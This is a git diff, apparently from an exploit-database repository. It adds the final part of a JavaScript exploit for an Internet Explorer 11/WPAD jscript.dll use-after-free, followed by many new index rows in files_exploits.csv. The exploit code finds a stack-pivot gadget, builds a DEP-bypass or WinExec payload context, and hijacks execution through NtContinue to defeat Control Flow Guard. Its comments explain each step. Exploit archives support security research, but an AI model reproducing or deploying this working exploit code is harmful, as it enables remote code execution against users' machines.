+ }
+ else {
+ MagicOffset = 0x11f + 19; // tanhf:0x00019a90 (+0x11f) <- 0x00019baf -> (+0x31) acosf:0x00019be0
+ }
+
+ // 49:8BE3 | mov rsp,r11
+ // C3 | ret
+
+ StackPivotAddress = HarvestGadget64(HintExportAddress, 0x500, 0xC3E38B49, 0x00000000FFFFFFFF, MagicOffset);
+
+ if(!StackPivotAddress.low && !StackPivotAddress.high) {
+ DebugLog("Failed to resolve address of stack pivot gadget");
+ return 0;
+ }
+
+ DebugLog("Gadget address of stack pivot: 0x" + StackPivotAddress.high.toString(16) + StackPivotAddress.low.toString(16));
+ Context = MakeContextDEPBypass64(LeakedStackPtr, ArtificialStackAddress, StackPivotAddress, VirtualProtectAddress, ShellcodeAddress, ShellcodeLen, WritableAddress);
+ DebugLog("Artificial stack pointer address at 0x" + ArtificialStackAddress.high.toString(16) + " " + ArtificialStackAddress.low.toString(16) +" shellcode at 0x" + ShellcodeAddress.high.toString(16) + ShellcodeAddress.low.toString(16) + " CONTEXT pointer: 0x" + FakeObjAddress.high.toString(16) + FakeObjAddress.low.toString(16));
+ }
+ else if(PayloadType == "winexec") {
+ CommandStr = CommandStr.substr(0, CommandStr.length);
+ var CommandStrAddress = LeakObjectAddress64(LeakedVvalAddress, CommandStr);
+ Context = MakeContextWinExec64(CommandStrAddress, LeakedStackPtr, WinExecAddress);
+ }
+
+ var RipHijackPropName = CreateVar64(0x81, LeakedVvalAddress.low + 96, LeakedVvalAddress.high, 0, 0) + CreateVar64(0, FakeVtableAddress.low, FakeVtableAddress.high, 0, 0) + Context; // 96 is the 64-bit prop name offset plus size of mutable VAR and next VAR Type field.
+
+ /*
+
+ jscript.dll!Object.Typeof method
+
+ mov rdi,qword ptr ds:[rdi+8]
+ mov rax,qword ptr ds:[rdi]
+ mov rbx,qword ptr ds:[rax+138]
+ mov rcx,rbx
+ call qword ptr ds:[7FFA554EC628]
+ mov rcx,rdi
+ call rbx
+
+ Initially RDI holds the pointer to the mutable VAR. Its object pointer is being loaded from +8, and then
+ RDI holds the pointer to the fake Object, which is dereferenced into RAX to obtain the vtable pointer.
+ Offset 0x138 holds the typeof method pointer within the vtable, which is subsequently passed to CFG
+ for validation.
+
+ Since the fake vtable holds the address of NTDLL.DLL!NtContine in place of its typeof method (and this
+ address is whitelisted by CFG) the security check will succeed and we will end up with an indirect branch
+ instruction (CALL RBX) whch will execute the RIP hijack.
+
+ Most notably, since a class method will always be passed its "this" pointer as its first parameter (which
+ in x64 will be held in RCX) we not only end up with a RIP hijack but also control of the RCX register.
+ Control of this register allows us to control the first parameter to NTDLL.DLL!NtContinue (in this case
+ a CONTEXT structure pointer) which conveniently will hold a pointer to our fake object, the contents of
+ which we control. Thus the fake object itself will be interpreted as CONTEXT struct we may control.
+
+ Malicious VVAL property name
+ ------------------
+ | VAR.Type | <-- Mutable var
+ |----------------| |
+ | VAR.ObjPtr | <------ Referencing fake object appended to itself in the VVAL property name
+ |----------------| |
+ | VAR.Type | |-- Not a real VAR (its Type is skipped and never referenced), just a 0 field.
+ |----------------| |
+ | Fake vtable ptr| <---|-- Fake object begins here. RCX and RDI point here
+ |----------------|
+ | VAR.NextPtr | <-- Unreferenced, a side-effect of using a VAR struct to initialize the fake object.
+ |----------------|
+ | CONTEXT | <-- Notably the first 16 bytes (2 QWORDs) of this struct will be confused with the fake vtable ptr and VAR.NextPtr fields. These fields represent the P1Home and P2Home registers and its fine if they are initialized to 0.
+ |________________|
+
+ */
+
+ ReClaimNameList(0, RipHijackPropName);
+ var TotalTime = (new Date().getTime() - ScriptTimeStart);
+ DebugLog("TIME ... total time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
+ typeof MutableVar;
+}
+
+function FindProxyForURL(url, host){
+ return "DIRECT";
+}
+
+Exploit();
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 73af0a7a8..758ab2ff7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6757,6 +6757,7 @@ id,file,description,date,author,type,platform,port
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux,
49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
+49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows,
48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
@@ -6769,19 +6770,33 @@ id,file,description,date,author,type,platform,port
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows,
+49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
+49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
+49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple,
+49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",1970-01-01,"Dolev Farhi",dos,php,
+49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
+49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,ios,
+49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
+49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
+49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",dos,windows,
+49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
+49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
+49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
+49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
+50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows,
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
@@ -11270,8 +11285,13 @@ id,file,description,date,author,type,platform,port
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",1970-01-01,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",1970-01-01,1F98D,local,java,
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",1970-01-01,rootabeta,local,windows,
+50465,exploits/linux/local/50465.c,"Mini-XML 3.2 - Heap Overflow",1970-01-01,LIWEI,local,linux,
49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows,
49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",1970-01-01,"Justin Steven",local,multiple,
+49514,exploits/solaris/local/49514.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
+49515,exploits/solaris/local/49515.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)",1970-01-01,"Marco Ivaldi",local,solaris,
+49516,exploits/solaris/local/49516.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",1970-01-01,"Marco Ivaldi",local,solaris,
+49517,exploits/solaris/local/49517.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",1970-01-01,"West Shepherd",local,multiple,
49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",1970-01-01,nu11secur1ty,local,multiple,
49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",1970-01-01,LiquidWorm,local,multiple,
@@ -11315,6 +11335,7 @@ id,file,description,date,author,type,platform,port
49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",1970-01-01,"Alan Mondragon",local,windows,
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows,
49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",1970-01-01,"George Tsimpidas",local,windows,
+49765,exploits/linux/local/49765.txt,"MariaDB 10.2 - 'wsrep_provider' OS Command Execution",1970-01-01,"Central InfoSec",local,linux,
49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows,
49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
@@ -11323,12 +11344,15 @@ id,file,description,date,author,type,platform,port
49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows,
+49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free",1970-01-01,"Forrest Orr",local,windows_x86-64,
49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64,
49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows,
+49882,exploits/windows/local/49882.ps1,"Visual Studio Code 1.47.1 - Denial of Service (PoC)",1970-01-01,"H.H.A.Ravindu Priyankara",local,windows,
49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",1970-01-01,"Alejandra Sánchez",local,windows,
49889,exploits/windows/local/49889.txt,"Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49890,exploits/windows/local/49890.txt,"Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49892,exploits/windows/local/49892.py,"Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code",1970-01-01,"BestEffort Team",local,windows,
+49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",1970-01-01,"Paolo Stagno",local,windows,
49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",1970-01-01,"Víctor García",local,windows,
@@ -11362,6 +11386,7 @@ id,file,description,date,author,type,platform,port
50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows,
50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android,
50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows,
+50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
@@ -11372,6 +11397,7 @@ id,file,description,date,author,type,platform,port
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
+50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
@@ -18504,6 +18530,7 @@ id,file,description,date,author,type,platform,port
49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux,
49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix,
49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware,
+49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload (2)",1970-01-01,liewehacksie,remote,linux,
49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris,
49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux,
49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware,
@@ -26055,12 +26082,14 @@ id,file,description,date,author,type,platform,port
49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",1970-01-01,"Aitor Herrero",webapps,php,
49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Aitor Herrero",webapps,php,
49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",1970-01-01,"Talat Mehmood",webapps,php,
+50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,multiple,
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple,
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php,
50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php,
49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php,
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php,
+49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80
30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php,
@@ -43323,6 +43352,7 @@ id,file,description,date,author,type,platform,port
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java,
+49574,exploits/php/webapps/49574.txt,"PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting",1970-01-01,"Anmol K Sachan",webapps,php,
49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php,
49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php,
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple,
@@ -43732,6 +43762,7 @@ id,file,description,date,author,type,platform,port
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,ChendoChap,webapps,hardware,
49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",1970-01-01,Mosaaed,webapps,php,
+49726,exploits/php/webapps/49726.py,"GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting",1970-01-01,boku,webapps,php,
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",1970-01-01,"Matthew Aberegg",webapps,php,
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",1970-01-01,"Musyoka Ian",webapps,php,
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",1970-01-01,"Kislay Kumar",webapps,php,
@@ -43776,6 +43807,7 @@ id,file,description,date,author,type,platform,port
49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",1970-01-01,SunCSR,webapps,php,
49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",1970-01-01,"Bedri Sertkaya",webapps,php,
49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",1970-01-01,B3KC4T,webapps,php,
+49367,exploits/multiple/webapps/49367.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting",1970-01-01,"Mesut Cetin",webapps,multiple,
49369,exploits/php/webapps/49369.txt,"Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Rahul Ramakant Singh",webapps,php,
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",1970-01-01,MoeAlBarbari,webapps,multiple,
49373,exploits/php/webapps/49373.txt,"Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,php,
@@ -43835,8 +43867,10 @@ id,file,description,date,author,type,platform,port
49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",1970-01-01,LiquidWorm,webapps,hardware,
+49459,exploits/hardware/webapps/49459.txt,"Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java,
+49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple,
@@ -43920,6 +43954,7 @@ id,file,description,date,author,type,platform,port
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php,
+49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting",1970-01-01,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php,
@@ -43969,6 +44004,7 @@ id,file,description,date,author,type,platform,port
49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple,
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware,
+49711,exploits/php/webapps/49711.py,"Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",1970-01-01,"Andrea Gonzalez",webapps,php,
49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php,
@@ -44014,6 +44050,7 @@ id,file,description,date,author,type,platform,port
49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple,
49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
+49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",1970-01-01,boku,webapps,php,
49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware,
49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple,
49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php,
@@ -44026,6 +44063,7 @@ id,file,description,date,author,type,platform,port
